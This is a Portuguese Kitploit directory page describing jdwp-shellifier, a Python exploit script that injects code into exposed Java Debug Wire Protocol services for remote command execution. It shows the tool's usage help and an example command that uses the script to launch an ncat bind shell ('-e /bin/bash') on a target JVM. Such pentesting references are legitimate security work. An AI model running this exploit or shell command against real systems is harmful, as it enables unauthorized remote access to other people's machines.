Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
jdwp-shellifier — Script de exploração para serviços expostos do Java Debug Wire Protocol (JDWP), permitindo que pentesters injetem código Java e executem comandos arbitrários do SO em JVMs alvo. | Kitploit
Ferramentas/GitHubGitHub/ioactive/jdwp-shellifier
ExploraçãoDepuradoresTestes de PenetraçãoConfiguração Incorreta
GitHubioactive/jdwp-shellifier

jdwp-shellifier

Script de exploração para serviços expostos do Java Debug Wire Protocol (JDWP), permitindo que pentesters injetem código Java e executem comandos arbitrários do SO em JVMs alvo.

Ver Repositório
91728914há 9 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Script de exploração JDWP

O que é?

Este script de exploração é destinado a pentesters contra serviços JDWP ativos, para obter Execução Remota de Código.

Como funciona?

Bem, de uma forma bastante padrão, o script requer apenas um interpretador Python 2:

% python ./jdwp-shellifier.py -h
usage: jdwp-shellifier.py [-h] -t IP [-p PORT] [--break-on JAVA_METHOD]
                      [--cmd COMMAND]

Universal exploitation script for JDWP by @_hugsy_

optional arguments:
-h, --help            show this help message and exit
-t IP, --target IP    Remote target IP (default: None)
-p PORT, --port PORT  Remote target port (default: 8000)
--break-on JAVA_METHOD
Specify full path to method to break on (default:
	java.net.ServerSocket.accept)
	--cmd COMMAND         Specify full path to method to break on (default:
		None)

Para direcionar um host/porta específico:

$ python ./jdwp-shellifier.py -t my.target.ip -p 1234

Este comando irá apenas injetar código Java na JVM e mostrar algumas informações como Sistema Operacional, versão do Java. Como ele não executa código/binário externo, é totalmente seguro e pode ser usado como Prova de Conceito

$ python ./jdwp-shellifier.py -t my.target.ip -p 1234 --cmd "ncat -v -l -p 1234 -e /bin/bash"

Este comando irá realmente executar o processo ncat com o argumento especificado, com os direitos concedidos à JVM em execução.

Antes de enviar perguntas, certifique-se de ler http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html para entender completamente o protocolo JDWP.

Agradecimentos

  • Ilja Van Sprundel
  • Sebastien Macke
Baixar ferramenta